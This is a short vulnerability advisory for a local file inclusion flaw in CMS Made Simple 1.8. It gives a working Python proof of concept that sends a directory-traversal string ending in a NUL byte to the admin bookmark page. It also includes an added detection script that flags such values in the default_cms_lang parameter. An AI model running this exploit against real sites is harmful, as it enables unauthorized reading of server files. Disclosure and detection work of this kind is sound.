CMS Made Simple 1.8 Local File Inclusion

Description

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

Proof Of Concept

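import http.client
import urllib.parse

host = 'localhost'
path = '/cmsms'

# Traversal string: 32 '../' segments, a known Windows file, and a trailing NUL byte
lfi = '../' * 32 + 'windows/win.ini\x00'

c = http.client.HTTPConnection(host)
# The traversal string is sent in the default_cms_lang POST parameter
c.request('POST', path + '/admin/addbookmark.php',
          urllib.parse.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print(r.status, r.reason)
print(r.read().decode('utf-8', 'replace'))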
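
A detection-side check for the request pattern in the proof of concept, as an added example that is not part of the original advisory or of CMS Made Simple: it decodes a captured form body and flags default_cms_lang values containing NUL bytes, directory traversal or path separators, including doubly encoded forms. The function names, the locale-code pattern for legitimate values and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

PARAM = "default_cms_lang"  # parameter name taken from the advisory
# Assumption: legitimate values look like locale codes such as "en_US".
LOCALE_RE = re.compile(r"[A-Za-z]{2,3}(_[A-Za-z]{2})?")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) up to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_body(body):
    """Return the reasons a form body looks like an inclusion attempt."""
    reasons = []
    for name, raw in parse_qsl(body, keep_blank_values=True):
        if name != PARAM:
            continue
        value = fully_decode(raw)
        if "\x00" in value:
            reasons.append("NUL byte")
        # Normalise Windows separators before looking for ".." segments.
        if ".." in value.replace("\\", "/").split("/"):
            reasons.append("directory traversal")
        if "/" in value or "\\" in value:
            reasons.append("path separator")
        if not reasons and not LOCALE_RE.fullmatch(value):
            reasons.append("not a locale code")
    return reasons


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "benign": "default_cms_lang=en_US&title=Docs",
    "advisory_shape": "default_cms_lang=" + "..%2F" * 32 + "windows%2Fwin.ini%00",
    "double_encoded": "default_cms_lang=..%255c..%255cexample.txt",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_body(body) or "ok")
```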


Copyright © 2018 AutoSec Tools LLC